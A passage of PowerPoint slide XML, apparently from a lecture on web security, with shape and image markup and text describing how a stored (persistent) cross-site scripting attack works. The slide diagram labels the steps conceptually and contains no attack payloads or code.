                    <a:pt x="16687" y="10325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21043" y="6857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26174" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32092" y="2565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38011" y="850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44272" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50901" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="10668">
              <a:solidFill>
                <a:srgbClr val="4579B8"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="72" name="object 72"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId22" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="25907" y="4038578"/>
              <a:ext cx="2572499" cy="111247"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="object 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="67561" y="4072249"/>
              <a:ext cx="2486660" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2486660">
                  <a:moveTo>
                    <a:pt x="2486139" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BD"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="74" name="object 74"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId23" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="33528" y="4552187"/>
              <a:ext cx="2578607" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="object 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="74416" y="4585586"/>
              <a:ext cx="2493010" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2493010">
                  <a:moveTo>
                    <a:pt x="2492794" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BD"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="76" name="object 76"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId24" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2132075" y="4869179"/>
              <a:ext cx="441959" cy="225551"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="77" name="object 77"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId25" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="4636007"/>
              <a:ext cx="2074151" cy="451103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="object 78"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="121627" y="4658651"/>
              <a:ext cx="1980564" cy="356235"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1980564" h="356235">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1980323" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1980323" y="356184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="356184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="79" name="object 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2484967" y="2078567"/>
            <a:ext cx="7205133" cy="2700867"/>
            <a:chOff x="1863725" y="1558925"/>
            <a:chExt cx="5403850" cy="2025650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="80" name="object 80"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId26" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1898649" y="1593850"/>
              <a:ext cx="5346699" cy="1968499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="object 81"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1878012" y="1573212"/>
              <a:ext cx="5375275" cy="1997075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5375275" h="1997075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5375275" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5375275" y="1997075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1997075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="131821"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="object 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864186" y="5154505"/>
            <a:ext cx="2795693" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>returns</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>embedded</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="object 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195067" y="5485441"/>
            <a:ext cx="1557020" cy="312073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="object 84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740987" y="5752199"/>
            <a:ext cx="1949027" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="539313"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-93" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="object 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7815283" y="6272105"/>
            <a:ext cx="830580" cy="312073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="object 86"/>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
            <a:ext cx="10475807" cy="6130803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="541867" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281932" algn="ctr">
              <a:spcBef>
                <a:spcPts val="4267"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Three</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Types</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="3007"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Stored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C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
